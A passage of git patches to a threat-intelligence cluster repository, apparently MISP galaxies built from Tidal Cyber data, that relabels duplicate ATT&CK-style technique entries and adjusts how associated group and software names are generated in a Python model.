websites. It has been used since at least 2004.[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)][[Talos ZxShell Oct 2014](https://app.tidalcyber.com/references/41c20013-71b3-4957-98f0-fb919014c93e)]", diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index f0487ee..858e50f 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -238,7 +238,7 @@ class GroupCluster(Cluster): meta=associated_meta, related=associated_related, uuid=associated_group.get("associated_group_id"), - value=associated_group.get("name"), + value=associated_group.get("name") + " - Associated Group", ) self.values.append(value.return_value()) related.append( @@ -339,7 +339,7 @@ class SoftwareCluster(Cluster): meta=associated_meta, related=associated_related, uuid=associated_software.get("associated_software_id"), - value=associated_software.get("name"), + value=associated_software.get("name") + " - Associated Software", ) self.values.append(value.return_value()) related.append( From a3071cf2708cacec07b2fcdd085d482f8d47fe6d Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 17:15:21 +0100 Subject: [PATCH 44/49] Add [techniques] codeblock for duplicates --- clusters/tidal-technique.json | 48 ++++++++++++++-------------- tools/tidal-api/models/cluster.py | 53 +++++++++++++++++++++++++++++++ 2 files changed, 77 insertions(+), 24 deletions(-) diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index d626c9b..3028e66 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -336,7 +336,7 @@ } ], "uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc", - "value": "Domain Account" + "value": "Domain Account - Duplicate" }, { "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).[[Microsoft Exchange Address Lists](https://app.tidalcyber.com/references/138ec24a-4361-4ce0-b78e-508c11db397c)]\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.[[Microsoft getglobaladdresslist](https://app.tidalcyber.com/references/a4948a80-d11c-44ed-ae63-e3f5660463f9)][[Black Hills Attacking Exchange MailSniper, 2016](https://app.tidalcyber.com/references/adedfddc-29b7-4245-aa67-cc590acb7434)]\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.[[Google Workspace Global Access List](https://app.tidalcyber.com/references/5104f0ea-1fb6-4260-a9b6-95922b3a8e5b)]", @@ -366,7 +366,7 @@ } ], "uuid": "df5f6835-ca0a-4ef5-bb3a-b011e4025545", - "value": "Local Account" + "value": "Local Account - Duplicate" }, { "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.", @@ -606,7 +606,7 @@ } ], "uuid": "be637d66-5110-4872-bc15-63b062c3f290", - "value": "Botnet" + "value": "Botnet - Duplicate" }, { "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://app.tidalcyber.com/technique/5c6c3492-5dbc-43ee-a3f2-ba1976d3b379)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.[[Unit42 DNS Mar 2019](https://app.tidalcyber.com/references/e41fde80-5ced-4f66-9852-392d1ef79520)]", @@ -636,7 +636,7 @@ } ], "uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d", - "value": "Domains" + "value": "Domains - Duplicate" }, { "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)] Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)][[FBI-search](https://app.tidalcyber.com/references/deea5b42-bfab-50af-8d85-cc04fd317a82)] Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.[[sentinelone-malvertising](https://app.tidalcyber.com/references/7989f0de-90b8-5e6d-bc20-1764610d1568)] \n\nMalvertising may be used to support [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5) and [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.[[BBC-malvertising](https://app.tidalcyber.com/references/425775e4-2948-5a73-a2d8-9a3edca74b1b)]\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.[[Masquerads-Guardio](https://app.tidalcyber.com/references/e11492f4-f9a3-5489-b2bb-a28b19ef88b5)] Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.[[spamhaus-malvertising](https://app.tidalcyber.com/references/15a4d429-28c3-52be-aeb8-d94ad2743866)] ", @@ -666,7 +666,7 @@ } ], "uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2", - "value": "Server" + "value": "Server - Duplicate" }, { "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)][[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)][[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]", @@ -681,7 +681,7 @@ } ], "uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f", - "value": "Serverless" + "value": "Serverless - Duplicate" }, { "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]", @@ -696,7 +696,7 @@ } ], "uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23", - "value": "Virtual Private Server" + "value": "Virtual Private Server - Duplicate" }, { "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", @@ -711,7 +711,7 @@ } ], "uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417", - "value": "Web Services" + "value": "Web Services - Duplicate" }, { "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)] Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)][[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)][[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)] Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", @@ -942,7 +942,7 @@ } ], "uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379", - "value": "DNS" + "value": "DNS - Duplicate" }, { "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", @@ -2215,7 +2215,7 @@ } ], "uuid": "4b187604-88ab-4972-9836-90a04c705e10", - "value": "Cloud Accounts" + "value": "Cloud Account - Duplicate" }, { "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.", @@ -2230,7 +2230,7 @@ } ], "uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6", - "value": "Email Accounts" + "value": "Email Accounts - Duplicate" }, { "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)] Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)] Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).", @@ -2245,7 +2245,7 @@ } ], "uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e", - "value": "Social Media Accounts" + "value": "Social Media Accounts - Duplicate" }, { "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)][[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)] Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).", @@ -2323,7 +2323,7 @@ } ], "uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b", - "value": "DNS Server" + "value": "DNS Server - Duplicate" }, { "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)] Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.[[Krebs DNS Hijack 2019](https://app.tidalcyber.com/references/9bdc618d-ff55-4ac8-8967-6039c6c24cb1)]\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.[[Microsoft Sub Takeover 2020](https://app.tidalcyber.com/references/b8005a55-7e77-4dc1-abed-f75a0a3d8afb)]\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.[[Palo Alto Unit 42 Domain Shadowing 2022](https://app.tidalcyber.com/references/ec460017-fd25-5975-b697-c8c11fee960d)]", @@ -3020,7 +3020,7 @@ } ], "uuid": "fe595943-f264-4d05-a8c7-7afc8985bfc3", - "value": "Code Repositories" + "value": "Code Repositories - Duplicate" }, { "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", @@ -3264,7 +3264,7 @@ } ], "uuid": "2735f8d1-0e46-4cd7-bfbb-78941bb266fd", - "value": "Steganography" + "value": "Steganography - Duplicate" }, { "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", @@ -3508,7 +3508,7 @@ } ], "uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8", - "value": "Code Signing Certificates" + "value": "Code Signing Certificates - Duplicate" }, { "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).\n\nAdversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)).\n\nAfter creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.", @@ -3523,7 +3523,7 @@ } ], "uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7", - "value": "Digital Certificates" + "value": "Digital Certificates - Duplicate" }, { "description": "Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)] Adversaries may use information acquired via [Vulnerabilities](https://app.tidalcyber.com/technique/fe96475a-3090-449d-91fd-ae73cb4d9c7c) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.[[Irongeek Sims BSides 2017](https://app.tidalcyber.com/references/ce11568a-36a8-4da2-972f-9cd67cc337d8)]\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).", @@ -3538,7 +3538,7 @@ } ], "uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c", - "value": "Exploits" + "value": "Exploits - Duplicate" }, { "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ActiveMalwareEnergy](https://app.tidalcyber.com/references/f2ef73c6-5d4c-423e-a3f5-194cba121eb1)][[FBI Flash FIN7 USB](https://app.tidalcyber.com/references/42dc957c-007b-4f90-88c6-1afd6d1032e8)]\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://app.tidalcyber.com/technique/2e883e0d-1108-431a-a2dd-98ba98b69417).[[FireEye APT29](https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)]", @@ -3553,7 +3553,7 @@ } ], "uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e", - "value": "Malware" + "value": "Malware - Duplicate" }, { "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.", @@ -8228,7 +8228,7 @@ } ], "uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58", - "value": "Digital Certificates" + "value": "Digital Certificates - Duplicate2" }, { "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.[[Exploit Database](https://app.tidalcyber.com/references/38f7b3ea-9959-4dfb-8216-a745d071e7e2)][[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)][[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)][[Wired SandCat Oct 2019](https://app.tidalcyber.com/references/5f28adee-1313-48ec-895c-27341bd1071f)] In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).", @@ -8769,7 +8769,7 @@ } ], "uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291", - "value": "Spearphishing Attachment" + "value": "Spearphishing Attachment - Duplicate" }, { "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)] URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s.[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)] These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. [[Microsoft OAuth 2.0 Consent Phishing 2021](https://app.tidalcyber.com/references/393e44fe-cf52-4c39-a79f-f7cdd9d8e16a)]", @@ -8784,7 +8784,7 @@ } ], "uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d", - "value": "Spearphishing Link" + "value": "Spearphishing Link - Duplicate" }, { "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the 